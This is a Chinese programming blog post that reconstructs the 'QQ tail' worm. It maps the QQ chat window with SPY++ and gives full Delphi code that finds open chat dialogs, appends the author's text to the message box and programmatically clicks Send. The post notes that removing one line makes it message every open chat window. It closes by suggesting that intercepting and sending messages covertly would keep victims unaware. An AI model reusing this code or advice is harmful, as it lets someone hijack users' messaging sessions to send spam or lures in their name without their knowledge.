QQ尾巴病毒的另一种实现

前几天看到 wuqiu 兄把 QQ尾巴病毒模拟了一遍，

我觉得通过查找窗体标题，不太合常理

回去用SPY++来查看了一下，原来，QQ的框架是这样的

无法显示

其中，#32770（对话框）就是弹出的QQ聊天界面；内部的控件就如上图显示的那样，有Static(标签)、Button（按钮）、AfxWnd42（这个我猜类似panel的容器）、RICHEDIT（这里面就是显示我们的聊天纪录了）

具体的布局就不一一的细说了，你们可以自己打开SPY++看看，一目了然

其中，我们用到的只是其中两个控件，如下图：

前半部分是句柄，中间是标题，后半部分是类名

如：05240258~发送(&S)~Button

就是发送按钮，句柄是05240258

好了，知道了这些，想做点什么就很简单了

全部代码如下：

Procedure TForm1.Timer1Timer(Sender: TObject);
Var
   hMemo, hRichEdit, HWindow, HButton: THandle; //句柄变量
   szText           : Array[0..255] Of char;   //得到的字符串
   MyText           : String; //发送的字符串
Begin
   HWindow := 0;//从零开始，即从第一个字窗体开始遍历查找

While true Do
Begin

         //找是#32770（对话框）的窗体
         HWindow := FindWindowEx(0, HWindow, '#32770', Nil);
         If HWindow <> 0 Then
            Begin

              //找是AfxWnd42（这个我猜类似panel的容器）的窗体
               hMemo := FindWindowEx(HWindow, 0, 'AfxWnd42', Nil);
               If hMemo <> 0 Then
                  Begin

                    //找是RICHEDIT的窗体
                     hRichEdit := FindWindowEx(hMemo, 0, 'RichEdit', Nil);
                     If hRichEdit <> 0 Then
                        Begin

//想些什么随便啦，嘿嘿
MyText := ' 阿德是个大帅哥，嘿嘿';

                          //发消息，得到QQ中的文本
                           SendMessage(hRichEdit, WM_GetTEXT, 256,
                              integer(@szText[0]));

//加上自己的话
MyText := szText + MyText;

                          //再发给QQ
                           SendMessage(hRichEdit, WM_SETTEXT, 256,
                              integer(MyText));

                          //找到发送按钮
                           HButton := FindWindowEx(HWindow, 0, 'Button',
                              '发送(&S)');

//发点击消息，发送
SendMessage(HButton, BM_CLICK, 0, 0);

//退出，如果去掉这句，就是给所有打开的QQ窗体发

                          //否则，只发给最前面的QQ窗体
                           break;
                        End;
                  End;
            End;
      End;
End;

这也只是对QQ尾巴的一种猜测，程序有很多不尽如人意的地方，比如发的文本在QQ中显示一下然后再发送，就如 wuqiu 兄的文章里说的，只要对消息进行拦截，然后再背地里偷偷的发送，就会神不知鬼不觉了